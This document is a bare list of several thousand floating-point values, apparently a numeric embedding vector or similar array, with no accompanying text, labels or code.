0.009674886241555214, 0.005110696889460087, -0.015823092311620712, 0.012757528573274612, -0.013363810256123543, 0.0244903564453125, -0.0021070416551083326, 0.007856042124330997, 0.0010663295397534966, 0.0032662346493452787, 0.014764235354959965, -0.0006372359930537641, 0.0176931731402874, -0.014935018494725227, -0.014055483043193817, 0.010264089331030846, 0.00036504975287243724, -0.03241471201181412, -0.007382117677479982, -0.0038789205718785524, -0.004167117644101381, 0.05550464242696762, 0.01847877725958824, -0.019349772483110428, 0.004675198812037706, -0.018854500725865364, -0.03907527029514313, -0.014175032265484333, 0.011135085485875607, -0.010050609707832336, -0.015865787863731384, -0.019435163587331772, -0.007578518707305193, -0.0238072220236063, 0.006921002175658941, -0.0026364705990999937, -0.01239034440368414, 0.034788601100444794, -0.030416544526815414, 0.006045736372470856, 0.025532135739922523, 0.011749905534088612, 0.005042383447289467, 0.026847168803215027, 0.004265318159013987, 0.017018577083945274, -0.022970382124185562, -0.0058109089732170105, 0.0010401783511042595, -0.009435789659619331, 0.002472091466188431, -0.050415292382240295, -0.02230432815849781, -0.012842920608818531, 0.016079267486929893, 0.003274773946031928, 0.01849585399031639, 0.0070533594116568565, 0.0021497374400496483, 0.011399799957871437, 0.024456199258565903, -0.01798350363969803, -0.04378889501094818, -0.020613569766283035, -0.0015359842218458652, -0.0009019504650495946, -0.0043229577131569386, -0.005272941198199987, 0.006720331497490406, -0.03528387472033501, 0.03617195039987564, 0.016694089397788048, 0.03130462020635605, 0.010136001743376255, -0.004828903824090958, -0.002465686993673444, 0.003319604555144906, 0.008133565075695515, 0.002320521045476198, 0.003136012237519026, -0.0312875397503376, 0.007467509247362614, -0.028367141261696815, -0.004500145558267832, 0.023107009008526802, -0.0003589122206903994, -0.004965530708432198, 0.018871579319238663, 0.004542841576039791, -0.029016120359301567, -0.028128044679760933, -0.01129732932895422, -0.00789019837975502, 0.006306181196123362, -0.002455013105645776, 0.009282084181904793, -0.0004923368687741458, 0.015874328091740608, -0.00006084162669139914, 0.01264651957899332, -0.02435372956097126, 0.026471445336937904, -0.012945390306413174, 0.006664826534688473, 0.013517515733838081, -0.001302224351093173, 0.0005491757183335721, 0.014055483043193817, 0.018820343539118767, -0.00609270203858614, -0.016121964901685715, -0.0031915169674903154, -0.012603823095560074, 0.010443411767482758, 0.00027231965214014053, 0.014755696058273315, 0.01781272143125534, -0.0020504696294665337, -0.003923751413822174, 0.007189985830336809, -0.003667576005682349, -0.005725517403334379, 0.015677927061915398, 0.0015648039989173412, -0.033405255526304245, 0.006617861334234476, -0.011536426842212677, 0.007689527701586485, 0.006878306157886982, -0.029579704627394676, -0.003671845654025674, 0.029887115582823753, 0.018734952434897423, 0.023790143430233, 0.011468113400042057, -0.0045044152066111565, 0.013210104778409004, 0.014542216435074806, -0.05058607831597328, 0.007612675428390503, 0.027837712317705154, 0.010639812797307968, -0.0020504696294665337, 0.027017952874302864, 0.009555337950587273, -0.0020099084358662367, 0.009683425538241863, -0.013987169601023197, 0.03876785933971405, -0.004145769868046045, 0.00910276174545288, 0.00004826635631616227, 0.006985045969486237, -0.005268671549856663, -0.027239970862865448, 0.0020035041961818933, -0.011587661691009998, 0.016975881531834602, -0.005230245180428028, 0.003964312374591827, 0.010742283426225185, -0.004175656940788031, -0.037743158638477325, -0.03743574768304825, 0.00817199144512415, -0.0002900651306845248, 0.002659953199326992, -0.009034448303282261, 0.010238471440970898, 0.009461406618356705, -0.0013844139175489545, 0.023226559162139893, 0.011075311340391636, 0.014789852313697338, 0.030296996235847473, -0.0027218624018132687, -0.0035843190271407366, -0.009666346944868565, -0.006506851874291897, -0.011852376163005829, 0.005392489489167929, 0.011510808952152729, -0.011801141314208508, -0.009589494206011295, -0.0005635856068693101, -0.018188444897532463, 0.0005657203728333116, -0.013090556487441063, -0.01110092829912901, -0.003915212117135525, 0.021740742027759552, -0.0014228401705622673, 0.021416252478957176, 0.010989919304847717, -0.0017249134834855795, 0.007416274398565292, 0.008005477488040924, 0.004182061180472374, -0.013995708897709846, 0.011203398928046227, 0.01808597519993782, -0.0031979214400053024, 0.020049985498189926, -0.0021219851914793253, 0.01103261485695839, 0.029477234929800034, 0.014200649224221706, -0.008820968680083752, -0.014414128847420216, -0.02203107438981533, 0.017001498490571976, -0.01503748819231987, 0.0013545267283916473, -0.004393405746668577, 0.0007231614436022937, 0.010195775888860226, -0.013039321638643742, -0.02341441996395588, -0.008142104372382164, -0.013064938597381115, -0.012612362392246723, 0.0000998016184894368, -0.0017142395954579115, 0.007518744096159935, -0.016975881531834602, 0.006434268783777952, 0.0002593774697743356, 0.020032906904816628, 0.014029866084456444, 0.005985962226986885, 0.010656891390681267, 0.0056998999789357185, -0.011801141314208508, 0.025190569460392, 0.016028033569455147, 0.017214978113770485, 0.00771941477432847, 0.03282459080219269, 0.019827965646982193, 0.0012520566815510392, -0.00554619450122118, -0.017078351229429245, 0.022150622680783272, -0.008586141280829906, 0.014815470203757286, 0.0006148206884972751, -0.019913358613848686, 0.0043805972672998905, 0.028059732168912888, -0.009973756968975067, 0.0030506206676363945, 0.0009756008512340486, -0.008889282122254372, 0.009572416543960571, 0.0013459875481203198, -0.01089598797261715, -0.0016662066336721182, 0.0003893330576829612, -0.01732598803937435, 0.006570895668119192, 0.006122589111328125, 0.004327227361500263, -0.0025937745813280344, -0.020511100068688393, 0.004901486914604902, 0.014926479198038578, 0.010699586942791939, 0.00652820011600852, -0.004974070005118847, -0.013713916763663292, 0.006114049814641476, -0.0010647284798324108, -0.010750822722911835, -0.006750218570232391, -0.006028658244758844, 0.007070437539368868, 0.006096971686929464, -0.001048717531375587, 0.02261173725128174, -0.01603657193481922, 0.005998771172016859, 0.004918565507978201, -0.010878910310566425, 0.025822468101978302, -0.010016453452408314, -0.015925562009215355, -0.01149373035877943, -0.01626713015139103, -0.020989295095205307, 0.0008944786968640983, 0.008090869523584843, -0.008820968680083752, -0.010187236592173576, -0.012697754427790642, -0.010776439681649208, 0.010443411767482758, -0.0071643684059381485, -0.007924355566501617, -0.0036633063573390245, 0.013082017190754414, 0.010366559028625488, -0.006737409625202417, 0.008270191960036755, 0.020084140822291374, 0.024029240012168884, 0.0010834079002961516, -0.00034396868431940675, 0.008645915426313877, 0.003200056031346321, -0.03441287949681282, -0.014738617464900017, 0.006242137402296066, -0.0008437773212790489, -0.0034007267095148563, -0.003029272658750415, 0.014251884073019028, -0.0005566475447267294, -0.01524242851883173, 0.0035992625635117292, -0.011442495509982109, 0.014747156761586666, -0.00628910306841135, -0.018325071781873703, -0.011587661691009998, 0.007518744096159935, -0.0028456803411245346, 0.019076518714427948, -0.00930770207196474, -0.007638292852789164, -0.004158578813076019, 0.004182061180472374, 0.010153080336749554, -0.015959719195961952, 0.008966134861111641, -0.0217919759452343, -0.00043363001896068454, -0.02886241488158703, -0.004961261060088873, 0.004773399326950312, -0.0051021575927734375, 0.002467821817845106, 0.0019704147707670927, -0.020049985498189926, -0.011664514429867268, -0.005793830845504999, -0.0014217727584764361, 0.03770900145173073, 0.0006564491195604205, -0.02162119373679161, -0.02968217432498932, -0.0015551974065601826, -0.01611342467367649, -0.004118017386645079, -0.0029139937832951546, -0.010656891390681267, -0.002329060109332204, -0.002422991208732128, -0.02355104684829712, -0.002303442684933543, -0.036376889795064926, 0.022526346147060394, -0.0010401783511042595, 0.002621527062729001, 0.018564168363809586, -0.0007498463965021074, -0.012023159302771091, 0.013842004351317883, -0.0009601236088201404, 0.003925886005163193, -0.004265318159013987, -0.0001399624306941405, 0.024729453027248383, 0.007569979410618544, 0.021057607606053352, -0.006728870328515768, 0.002273555612191558, -0.015148498117923737, 0.009034448303282261, 0.00290972413495183, -0.008727037347853184, -0.008812429383397102, -0.00897467415779829, -0.0018081704620271921, 0.00788165908306837, -0.022884991019964218, 0.009256466291844845, 0.006827071309089661, -0.015464447438716888, 0.0006847351905889809, 0.006822801660746336, 0.01661723665893078, 0.02040863037109375, -0.011877994053065777, 0.012262256816029549, 0.01524242851883173, -0.0008133564842864871, -0.009615112096071243, -0.01576331816613674, 0.009435789659619331, 0.0063873035833239555, 0.01658307947218418, 0.0011090254411101341, -0.01823967881500721, 0.019401008263230324, 0.005392489489167929, 0.0036013973876833916, 0.009205231443047523, 0.018307993188500404, 0.013466279953718185, 0.019349772483110428, -0.007514474913477898, -0.00230984715744853, -0.0025446743238717318, -0.0010834079002961516, -0.003575779963284731, -0.009777355939149857, -0.004145769868046045, -0.013765151612460613, -0.027035031467676163, 0.008304348215460777, 0.002960959216579795, -0.010913066565990448, -0.00910276174545288, 0.003985660150647163, -0.020784353837370872, -0.014704461209475994, -0.011613279581069946, -0.0010545882396399975, 0.005652934312820435, -0.010511725209653378, -0.004986878484487534, -0.006835610140115023, 0.008637376129627228, -0.0034519617911428213, 0.004282396752387285, -0.033132001757621765, -0.02121131308376789, 0.012330570258200169, -0.005465072579681873, 0.009094222448766232, 0.00843670591711998, 0.0028883761260658503, -0.0021678833290934563, -0.0057425955310463905, -0.008820968680083752, 0.010024992749094963, -0.003153090598061681, 0.03297829627990723, -0.001420705346390605, 0.004961261060088873, 0.03723080828785896, -0.0012862134026363492, -0.00008525833254680037, -0.0023504081182181835, -0.007779189385473728, 0.00775357149541378, 0.009504103101789951, -0.03743574768304825, 0.026027407497167587, -0.01122047659009695, -0.0244903564453125, 0.011066772043704987, 0.006861227564513683, -0.015541300177574158, -0.003942964598536491, -0.007219873368740082, -0.007501665968447924, -0.0071216728538274765, -0.014619069173932076, 0.010955763049423695, 0.0007631888147443533, 0.014619069173932076, 0.03075811080634594, -0.002967363689094782, -0.000021414651200757362, -0.015669386833906174, 0.001972549594938755, -0.012612362392246723, -0.02083558961749077, -0.0016512630973011255, 0.027035031467676163, -0.0032939871307462454, 0.01278314646333456, 0.003031407482922077, -0.013978631235659122, -0.0024699566420167685, 0.00795851182192564, -0.011784062720835209, -0.026590993627905846, 0.013312575407326221, -0.015754779800772667, 0.008210417814552784, -0.021006371825933456, 0.0020878284703940153, -0.000025800985895330086, 0.006703252904117107, -0.004756320733577013, -0.006997854448854923, 0.01149373035877943, -0.01625005155801773, -0.0025766962207853794, 0.005516307428479195, -0.006105510517954826, 0.018342150375247, 0.0042525096796453, 0.002346138469874859, -0.007313804235309362, -0.011690131388604641, -0.01305640023201704, -0.0065794349648058414, 0.007514474913477898, 0.0005409034201875329, 0.025480899959802628, -0.01652330532670021, -0.0029993855860084295, -0.016941724345088005, 0.002952420152723789, -0.015413212589919567, -0.003718811087310314, -0.007574249058961868, 0.010153080336749554, 0.006938080303370953, -0.008722768165171146, 0.002802984556183219, 0.017095429822802544, 0.002102772006765008, 0.004365653730928898, 0.023431498557329178, 0.017898112535476685, -0.03497646376490593, -0.006694714073091745, 0.012740449979901314, -0.013073477894067764, 0.014081100933253765, 0.0012766068102791905, -0.013227183371782303, -0.016258589923381805, -0.009145457297563553, 0.004952721763402224, -0.0033324132673442364, -0.01258674543350935, -0.016275668516755104, -0.00837693177163601, -0.0014399185311049223, 0.02664222940802574, 0.014183570630848408, -0.004248240031301975, 0.010136001743376255, -0.0008181597804650664, 0.010930145159363747, -0.011152164079248905, 0.006032927893102169, -0.021740742027759552, 0.015754779800772667, 0.009265005588531494, 0.001285145990550518, 0.005255862604826689, 0.0014644686598330736, 0.02544674463570118, -0.009213770739734173, 0.01103261485695839, -0.003609936684370041, 0.0025489439722150564, -0.00319578661583364, -0.0007631888147443533, -0.006336068268865347, -0.006921002175658941, -0.008786811493337154, 0.0071985251270234585, -0.021057607606053352, -0.008317157626152039, -0.0020035041961818933, 0.016454990953207016, -0.006891115102916956, 0.011929228901863098, 0.0011559908743947744, -0.005268671549856663, -0.017778564244508743, -0.0059133791364729404, 0.03427625074982643, 0.003133877646178007, 0.003631284460425377, 0.012398883700370789, -0.00594753585755825, 0.012731911614537239, -0.010622735135257244, -0.00404756935313344, -0.01875203102827072, 0.001528512453660369, 0.006758757866919041, 0.0031829779036343098, 0.014414128847420216, -0.008014016784727573, 0.0025660223327577114, -0.0057212477549910545, 0.0027602885384112597, -0.0025660223327577114, -0.022406797856092453, -0.006139667239040136, 0.00034343497827649117, 0.01128879003226757, 0.022799599915742874, 0.01999874971807003, -0.02898196317255497, -0.002455013105645776, 0.016770942136645317, -0.015566917136311531, -0.006472695153206587, -0.026095721870660782, 0.007535822689533234, -0.014653225429356098, -0.009691964834928513, 0.01986212283372879, 0.006575165316462517, 0.013329653069376945, -0.003791394177824259, -0.009896905161440372, -0.012296413071453571, -0.035591285675764084, 0.016104886308312416, 0.009316240437328815, 0.020596493035554886, -0.01810305193066597, -0.013876160606741905, 0.006429999601095915, -0.009085683152079582, 0.005832257214933634, 0.007924355566501617, -0.008295808918774128, -0.015558378770947456, 0.0026748967356979847, 0.01211709063500166, -0.01864955946803093, 0.023431498557329178, 0.038426291197538376, 0.0020216498523950577, 0.004679468460381031, 0.0009846737375482917, 0.006660557352006435, 0.006485504098236561, 0.0025788310449570417, -0.01782980002462864, 0.0032320781610906124, 0.02220185659825802, -0.004760590381920338, 0.013218644075095654, -0.0034434227272868156, 0.0077834585681557655, 0.005631586536765099, 0.02636897563934326, 0.0013801442692056298, 0.01917898841202259, -0.0002873966295737773, 0.004726433660835028, 0.015028949826955795, -0.006805723067373037, -0.016514766961336136, -0.020067064091563225, -0.022082308307290077, 0.020374473184347153, 0.011126546189188957, -0.0013449202524498105, -0.006916732527315617, 0.004314418416470289, -0.002352542942389846, -0.009000291116535664, 0.009333319030702114, -0.004316553473472595, -0.014414128847420216, -0.004679468460381031, -0.005554733797907829, -0.0030100594740360975, 0.024866079911589622, 0.02271420694887638, -0.03893864154815674, 0.008786811493337154, 0.005874952767044306, -0.002659953199326992, -0.018171366304159164, -0.00626348564401269, -0.007433352526277304, -0.0072326818481087685, -0.0012040238361805677, -0.017155203968286514, -0.006763027049601078, -0.029852958396077156, -0.005255862604826689, 0.011468113400042057, 0.005738326348364353, -0.010093306191265583, 0.007834693416953087, -0.0037380242720246315, -0.016258589923381805, -0.0028008497320115566, -0.022116465494036674, -0.014456824399530888, -0.011647435836493969, 0.0005534453084692359, 0.029835879802703857, -0.0231411661952734, -0.01691610738635063, -0.019571790471673012, 0.000789873767644167, 0.004863060545176268, -0.004982609301805496, 0.011510808952152729, -0.01484108716249466, -0.030945973470807076, -0.007224142551422119, 0.01298808678984642, -0.009743199683725834, -0.010605656541883945, 0.017488231882452965, -0.021382097154855728, 0.0035224100574851036, 0.022406797856092453, -0.008031094446778297, -0.007283917162567377, 0.013602906838059425, -0.009136918000876904, -0.014209188520908356, -0.01123755518347025, -0.013090556487441063, -0.019896280020475388, 0.0013908182736486197, -0.00917961448431015, -0.010426334105432034, -0.004982609301805496, 0.029750488698482513, -0.012347647920250893, -0.031492479145526886, -0.010306784883141518, 0.009598033502697945, 0.012885616160929203, 0.015754779800772667, -0.01272337231785059, 0.007202794775366783, -0.009905443526804447, -0.007937164045870304, -0.01755654625594616, -0.014115258120000362, -0.005315636750310659, -0.005294288974255323, 0.012074395082890987, 0.0004894015146419406, -0.016429373994469643, -0.007834693416953087, 0.01177552342414856, 0.0072881863452494144, -0.012407422065734863, 0.012296413071453571, -0.0027987149078398943, -0.007207064423710108, 0.0006046803900972009, 0.012202482670545578, -0.009418711066246033, -0.009845669381320477, 0.0122366389259696, 0.0023610820062458515, 0.0012136303121224046, -0.011203398928046227, 0.002751749474555254, 0.013628524728119373, -0.02679593302309513, -0.01794934831559658, -0.022218935191631317, -0.011476652696728706, -0.023653516545891762, 0.010682509280741215, -0.012475735507905483, 0.013628524728119373, 0.009709042496979237, -0.00632325978949666, 0.0176931731402874, 0.014465363696217537, -0.0006874036625958979, 0.0025404049083590508, 0.008611759170889854, -0.0008170923683792353, 0.018017660826444626, -0.004615424666553736, -0.0022201857063919306, -0.014064022339880466, 0.013432123698294163, -0.028537925332784653, 0.0010625936556607485, -0.016378140076994896, 0.009128378704190254, 0.00461969431489706, -0.0020152456127107143, 0.006472695153206587, 0.0038511683233082294, -0.007027741521596909, -0.019349772483110428, 0.0036974630784243345, -0.003955773077905178, 0.015566917136311531, 0.008342774584889412, 0.002694109920412302, 0.012800224125385284, -0.0006671231240034103, -0.023380262777209282, -0.0018380576511844993, 0.008107947185635567, 0.03212437778711319, -0.012091472744941711, -0.01510580163449049, 0.016028033569455147, -0.010639812797307968, 0.027410754933953285, 0.008624567650258541, -0.0009734660270623863, -0.02192860282957554, 0.002292768796905875, 0.005559003446251154, 0.007215603720396757, 0.007254030089825392, -0.009777355939149857, 0.0038063377141952515, -0.004132960923016071, -0.015208272263407707, 0.0037999332416802645, 0.011246094480156898, -0.0034519617911428213, 0.008065251633524895, -0.002563887508586049, 0.004019816871732473, 0.010784978978335857, 0.01136564277112484, 0.010067688301205635, -0.013850543648004532, 0.029340608045458794, -0.0056657432578504086, -0.013551671989262104, -0.0013940205099061131, -0.005106427241116762, 0.0016160390805453062, 0.023243635892868042, 0.010580038651823997, 0.003846898674964905, 0.002176422392949462, -0.009623651392757893, 0.017898112535476685, 0.011621817946434021, -0.012629440985620022, 0.010955763049423695, 0.0007055493770167232, 0.00008699285535840318, 0.0027923104353249073, 0.013688298873603344, -0.0015498604625463486, 0.002073952229693532, -0.006464156322181225, -0.011442495509982109, 0.011006997898221016, -0.008470862172544003, -0.016028033569455147, 0.023704752326011658, -0.0045385719276964664, 0.005336984992027283, 0.003981390502303839, -0.02560044825077057, 0.019554711878299713, -0.002171085448935628, -0.011920689605176449, 0.0078090764582157135, -0.017590701580047607, -0.007595596835017204, 0.022680051624774933, -0.026471445336937904, 0.006703252904117107, -0.021279625594615936, 0.004850252065807581, 0.037196651101112366, 0.006536738947033882, -0.005319906398653984, -0.010118923150002956, -0.02162119373679161, -0.005166201386600733, 0.008812429383397102, -0.0034946578089147806, -0.0008459120872430503, -0.00015997611626517028, -0.008667263202369213, -0.01718936115503311, -0.0043336316011846066, -0.00017211776867043227, -0.0183592289686203, 0.007322343066334724, 0.014157953672111034, -0.023311950266361237, 0.01572062261402607, 0.005815178621560335, -0.0052046277560293674, 0.017898112535476685, -0.009802973829209805, -0.01279168576002121, 0.007224142551422119, 0.0071088639087975025, 0.0010695317760109901, -0.002329060109332204, -0.003432748606428504, 0.017915191128849983, 0.0071558295749127865, -0.005029574502259493, -0.010844753123819828, -0.0016181737883016467, -0.0023568125907331705, -0.005661473609507084, -0.00001949667239387054, 0.002501978538930416, 0.0012872808147221804, -0.012885616160929203, 0.030945973470807076, -0.011758444830775261, 0.009623651392757893, 0.0013054264709353447, 0.013619985431432724, -0.020920980721712112, 0.003558701602742076, -0.006037197541445494, -0.0009243657696060836, 0.021860290318727493, -0.02206522971391678, 0.0011207668576389551, -0.013508976437151432, 0.003603532211855054, -0.004807556048035622, 0.01103261485695839, -0.0038639770355075598, -0.006942349951714277, -0.010802057571709156, -0.004327227361500263, 0.009213770739734173, 0.015028949826955795, -0.004269587807357311, -0.014584911987185478, 0.012330570258200169, 0.038597073405981064, 0.02001582831144333, -0.0015210406854748726, -0.011391260661184788, 0.0025404049083590508, -0.009367476217448711, -0.005938997026532888, 0.01318448781967163, -0.0035821842029690742, 0.0026108529418706894, 0.016335442662239075, -0.00568282138556242, 0.0016501956852152944, 0.013543132692575455, -0.027461988851428032, 0.012484274804592133, -0.004384866915643215, 0.018974049016833305, 0.017522389069199562, 0.009785895235836506, 0.00050594616914168, -0.008692881092429161, -0.014448285102844238, -0.014849626459181309, 0.0019490668782964349, -0.0017750811530277133, -3.8776531141593296e-7, -0.018307993188500404, -0.014550755731761456, -0.004777668975293636, -0.006293372716754675, 0.027154579758644104, -0.0035330839455127716, -0.014712999574840069, 0.0008918101666495204, 0.005460802931338549, -0.005460802931338549, -0.0004555116465780884, 0.012219560332596302, 0.007663910277187824, 0.020613569766283035, -0.013611446134746075, -0.003752967808395624, 0.009649268351495266, 0.0008096206001937389, -0.011519348248839378, 0.01490940060466528, 0.027991417795419693, -0.008090869523584843, -0.023704752326011658, 0.002529730787500739, 0.0011794737074524164, 0.002954554744064808, 0.015396133996546268, 0.00044323658221401274, -0.011322947219014168, -0.0020440651569515467, 0.0038639770355075598, 0.0025596178602427244, 0.010562960058450699, -0.01808597519993782, -0.003678249893710017, -0.004884408786892891, 0.001745194080285728, 0.0072881863452494144, -0.014243345707654953, 0.00628910306841135, 0.006045736372470856, 0.0035544319543987513, -0.0008736644522286952, 0.0027218624018132687, -0.010076227597892284, 0.0027304014656692743, 0.01169867068529129, 0.009273544885218143, -0.0032427520491182804, 0.011143624782562256, 0.004179926589131355, 0.007002124097198248, 0.00836839247494936, -0.004547111224383116, -0.003614206099882722, -0.0032320781610906124, 0.019537635147571564, -0.0014388511190190911, -0.0008651252719573677, 0.01878618635237217, 0.0038810553960502148, 0.0176931731402874, -0.02025492489337921, 0.008560523390769958, 0.013696838170289993, 0.0010876775486394763, 0.028384219855070114, -0.00628910306841135, 0.005968884099274874, -0.02273128554224968, 0.009794434532523155, -0.009760278277099133, -0.034207940101623535, 0.00287556741386652, 0.006327529437839985, 0.002734671114012599, 0.002649279311299324, -0.0022436685394495726, -0.0072326818481087685, 0.01102407556027174, 0.009649268351495266, -0.01974257454276085, 0.010537343099713326, -0.0016064324881881475, 0.010878910310566425, 0.014149414375424385, 0.003942964598536491, 0.020084140822291374, -0.005793830845504999, 0.005439455155283213, -0.007104594260454178, -0.011655975133180618, 0.0025895051658153534, 0.015165576711297035, -0.01661723665893078, 0.0016523305093869567, -0.007032011169940233, 0.009674886241555214, 0.0021358614321798086, 0.01679655909538269, 0.023841379210352898, -0.01196338515728712, -0.020186612382531166, -0.019810887053608894, -0.007006393745541573, 0.014712999574840069, 0.004649581387639046, 0.03620610386133194, -0.008991751819849014, -0.003142416710034013, 0.018273836001753807, -0.005605969112366438, 0.007757841143757105, 0.009905443526804447, 0.007160098757594824, 0.004730703309178352, -0.008795350790023804, 0.0008053510100580752, -0.0024635521695017815, -0.03036530874669552, 0.0006073488621041179, -0.0013972226297482848, 0.02490023709833622, 0.017377221956849098, 0.02776939980685711, 0.002621527062729001, -0.018700795248150826, -0.007992669008672237, -0.007510205265134573, -0.00870142038911581, -0.002995115937665105, 0.02327779307961464, 0.009427250362932682, -0.021689506247639656, -0.009862747974693775, -0.009410171769559383, 0.029067354276776314, 0.006429999601095915, -0.010332402773201466, -0.01264651957899332, -0.01605365052819252, 0.019144833087921143, 0.010007914155721664, -0.0016875546425580978, 0.01796642504632473, 0.013064938597381115, -0.018803264945745468, -0.005319906398653984, -0.023738909512758255, -0.0024016431998461485, 0.015063106082379818, -0.024165866896510124, 0.0017910921014845371, 0.009888365864753723, -0.02271420694887638, 0.01570354402065277, 0.0056870910339057446, -0.027274128049612045, 0.010007914155721664, -0.022765442728996277, -0.0014569968916475773, -0.007548631634563208, 0.011348565109074116, -0.009247926995158195, 0.003136012237519026, -0.00117200193926692, -0.07309534400701523, 0.006327529437839985, 0.013859082013368607, 0.011681592091917992, 0.017795642837882042, -0.005003957077860832, 0.0049783396534621716, -0.007236951496452093, 0.004858790896832943, 0.006763027049601078, -0.004969800356775522, -0.010007914155721664, 0.009982296265661716, -0.004440371412783861, 0.01960594765841961, 0.02285083383321762, -0.005375411361455917, 0.023568125441670418, 0.01878618635237217, -0.008940516971051693, -0.006605052389204502, -0.009743199683725834, -0.022236013785004616, -0.002188163809478283, -0.008265921846032143, -0.0019864258356392384, 0.005140583962202072, -0.025617526844143867, -0.00011974859808105975, -0.007672449573874474, 0.0013897508615627885, 0.0023845648393034935, -0.0011901475954800844, -0.0036867891903966665, -0.024404965341091156, -0.03917773813009262, 0.009367476217448711, -0.011468113400042057, -0.007493126671761274, 0.00013022242637816817, 0.009598033502697945, 0.006903923582285643, -0.008099407888948917, -0.004910026211291552, 0.007540092337876558, 0.0017099699471145868, -0.01597679778933525, 0.012877076864242554, -0.014943557791411877, 0.013022243045270443, -0.004103073850274086, -0.007172907702624798, 0.023192401975393295, -0.015814553946256638, -0.004109478555619717, 0.017607780173420906, -0.011254633776843548, -0.0025895051658153534, -0.009982296265661716, -0.0034348834306001663, 0.010033532045781612, 0.0017185091273859143, 0.010101844556629658, -0.020784353837370872, 0.003665441181510687, 0.01591702364385128, 0.011186320334672928, 0.014644686132669449, 0.0118950717151165, 0.00329825677908957, -0.006468425504863262, 0.0033665699884295464, 0.004397675395011902, -0.011596200987696648, -0.002198837697505951, 0.01244157925248146, -0.013133252039551735, 0.009051525965332985, 0.0035608364269137383, 0.0050680008716881275, 0.0085050193592906, -0.009008830413222313, -0.010298246517777443, 0.002371756127104163, -0.016770942136645317, -0.008381200954318047, -0.01278314646333456, 0.006003040820360184, 0.005610238295048475, 0.0016096346080303192, 0.012091472744941711, -0.000664988299831748, -0.012347647920250893, 0.02787186950445175, 0.022526346147060394, -0.0030676990281790495, 0.0004448377003427595, 0.003757237456738949, 0.010913066565990448, 0.005059461575001478, 0.0057682134211063385, 0.0033687048126012087, 0.007510205265134573, -0.0030890468042343855, -0.0002380295336479321, -0.022082308307290077, -0.007006393745541573, -0.0244903564453125, -0.005597429815679789, -0.02040863037109375, 0.028794100508093834, 0.0023674864787608385, 0.007672449573874474, -0.011673053726553917, 0.004713625181466341, -0.005550464149564505, 0.013423584401607513, 0.008090869523584843, -0.01812013052403927, -0.008569062687456608, -0.036103636026382446, -0.009333319030702114, 0.007493126671761274, -0.0021806920412927866, -0.0018391249468550086, -0.00020747528469655663, -0.010238471440970898, -0.0021123785991221666, -0.00769379734992981, -0.0004328294890001416, 0.026044486090540886, 0.0017131721833720803, 0.005127775017172098, -0.001077537308447063, 0.005883492063730955, -0.027581537142395973, 0.00026631553191691637, -0.016062188893556595, 0.026608072221279144, -0.007300995290279388, -0.023499811068177223, -0.006950889248400927, 0.025395508855581284, 0.0023674864787608385, -0.0056145079433918, -0.00017171748913824558, -0.0016982286470010877, 0.022509267553687096, 0.004880139138549566, -0.004764860030263662, 0.02011829800903797, -0.00227569043636322, -0.002536135260015726, 0.010682509280741215, 0.004914295859634876, -0.006959428079426289, 0.0007071504951454699, 0.0072326818481087685, 0.0023845648393034935, -0.005238784477114677, 0.0013011569390073419, 0.018700795248150826, -0.007621214259415865, 0.021689506247639656, -0.018444620072841644, -0.004850252065807581, -0.008146373555064201, 0.0038917292840778828, -0.02261173725128174, 0.009717581793665886, 0.008872203528881073, 0.0156437698751688, -0.011143624782562256, -0.005486420355737209, 0.003712406614795327, 0.01736014522612095, -0.016045112162828445, -0.01177552342414856, -0.0071216728538274765, 0.0013694703811779618, 0.003699597902595997, 0.0010812731925398111, 0.001142114750109613, -0.019947513937950134, -0.007834693416953087, -0.020886823534965515, 0.0010551218874752522, 0.014089640229940414, -0.005247323773801327, 0.010597117245197296, 0.03900695592164993, 0.04132961109280586, -0.00312747317366302, -0.010921605862677097, 0.0014815470203757286, 0.006148206535726786, -0.012398883700370789, 0.011587661691009998, -0.02612987719476223, -0.006233598571270704, 0.010878910310566425, 0.009247926995158195, 0.013116174377501011, 0.003501062048599124, 0.0038106071297079325, 0.0013064938830211759, 0.007433352526277304, -0.017727328464388847, 0.007612675428390503, -0.0021123785991221666, 0.002142265671864152, 0.005529116373509169, -0.005661473609507084, 0.0024891698267310858, 0.003048485843464732, -0.006733139976859093, -0.013406505808234215, 0.018991127610206604, -0.00649404339492321, 0.02394384890794754, 0.02491731569170952, 0.015455908142030239, 0.002182826865464449, -0.0011218342697247863, -0.005934727378189564, -0.011877994053065777, 0.02203107438981533, 0.01851293258368969, 0.014465363696217537, 0.03169742226600647, 0.004233296494930983, -0.0028670283500105143, 0.0071216728538274765, 0.013611446134746075, -0.00564866466447711, 0.005473611876368523, 0.016412295401096344, -0.008957595564424992, 0.004113747738301754, -0.006818532012403011, 0.03501062095165253, -0.011126546189188957, -0.004030491225421429, -0.006541008595377207, -0.015806013718247414, 0.01917898841202259, 0.03250010311603546, 0.00222872500307858, 0.002188163809478283, -0.02175782062113285, -0.0017366549000144005, -0.03089473769068718, -0.013107635080814362, 0.021040529012680054, 0.007484587840735912, 0.007194255478680134, -0.0028841067105531693, -0.013611446134746075, 0.0011698671150952578, 0.0071985251270234585, -0.005183279514312744, -0.0012018890120089054, 0.02628358267247677, 0.009077143855392933, -0.02763277292251587, -0.008248844183981419, 0.005362602416425943, -0.013133252039551735, 0.013423584401607513, 0.014004248194396496, 0.009247926995158195, -0.01484108716249466, 0.0018679447239264846, -0.01102407556027174, -0.014422668144106865, -0.0016736785182729363, -0.0077279540710151196, 0.004961261060088873, -0.012885616160929203, -0.017915191128849983, -0.004393405746668577, -0.023790143430233, -0.004241835791617632, -0.010691048577427864, 0.014072561636567116, 0.014106718823313713, -0.026761777698993683, -0.010426334105432034, -0.01946932077407837, 0.014405589550733566, 0.0013897508615627885, 0.0018156422302126884, -0.012620901688933372, -0.010238471440970898, -0.021996917203068733, 0.003774315817281604, 0.002440069569274783, 0.013150330632925034, -0.00937601551413536, 0.005576082039624453, 0.014226267114281654, -0.009119839407503605, -0.009222310036420822, -0.004641042090952396, 0.016489148139953613, 0.010417794808745384, 0.031782813370227814, 0.01675386354327202, -0.001807103049941361, 0.00568282138556242, 0.016164660453796387, 0.0037764504086226225, -0.012672136537730694, 0.0013972226297482848, 0.004875869490206242, 0.004314418416470289, -0.005618777591735125, -0.020169533789157867, -0.006916732527315617, -0.007275377865880728, 0.003784989705309272, 0.005255862604826689, -0.011126546189188957, 0.008274461142718792, -0.004863060545176268, 0.013901778496801853, 0.009418711066246033, -0.010913066565990448, 0.030023742467164993, 0.009512641467154026, 0.016010954976081848, -0.0033687048126012087, -0.02722289226949215, 0.010451951064169407, -0.004261048510670662, 0.019657183438539505, -0.019025282934308052, -0.015276585705578327, -0.00877827312797308, 0.0032598304096609354, 